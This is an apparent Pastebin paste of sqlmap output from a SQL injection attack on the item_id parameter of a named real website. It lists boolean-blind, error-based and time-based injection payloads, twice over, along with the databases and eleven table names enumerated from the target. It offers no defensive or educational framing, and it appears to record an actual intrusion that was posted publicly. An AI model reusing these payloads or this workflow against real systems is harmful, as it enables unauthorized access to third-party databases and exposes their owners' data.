sauzadeace

www.masshist.org

May 25th, 2012
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.76 KB | None | 0 0
  1. ---
  2. Place: GET
  3. Parameter: item_id
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: item_id=99 AND 1750=1750
  7.  
  8. Type: error-based
  9. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  10. Payload: item_id=99 AND (SELECT 9809 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,104,111,58),(SELECT (CASE WHEN (9809=9809) THEN 1 ELSE 0 END)),CHAR(58,108,107,108,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  11.  
  12. Type: AND/OR time-based blind
  13. Title: MySQL > 5.0.11 AND time-based blind
  14. Payload: item_id=99 AND SLEEP(5)
  15. ---
  16.  
  17. available databases [2]:
  18. [*] information_schema
  19. [*] nu_view
  20.  
  21. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  22. ---
  23. Place: GET
  24. Parameter: item_id
  25. Type: boolean-based blind
  26. Title: AND boolean-based blind - WHERE or HAVING clause
  27. Payload: item_id=99 AND 1750=1750
  28.  
  29. Type: error-based
  30. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  31. Payload: item_id=99 AND (SELECT 9809 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,104,111,58),(SELECT (CASE WHEN (9809=9809) THEN 1 ELSE 0 END)),CHAR(58,108,107,108,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  32.  
  33. Type: AND/OR time-based blind
  34. Title: MySQL > 5.0.11 AND time-based blind
  35. Payload: item_id=99 AND SLEEP(5)
  36. ---
  37.  
  38. Database: nu_view
  39. [11 tables]
  40. +----------------------+
  41. | categories |
  42. | category_assignments |
  43. | images |
  44. | items |
  45. | owning_institutions |
  46. | project_assignments |
  47. | projects |
  48. | subject_assignments |
  49. | subjects |
  50. | transcriptions |
  51. | workflow |
  52. +----------------------+
  53.  
  54. sauzadeace
Add Comment
Please, Sign In to add comment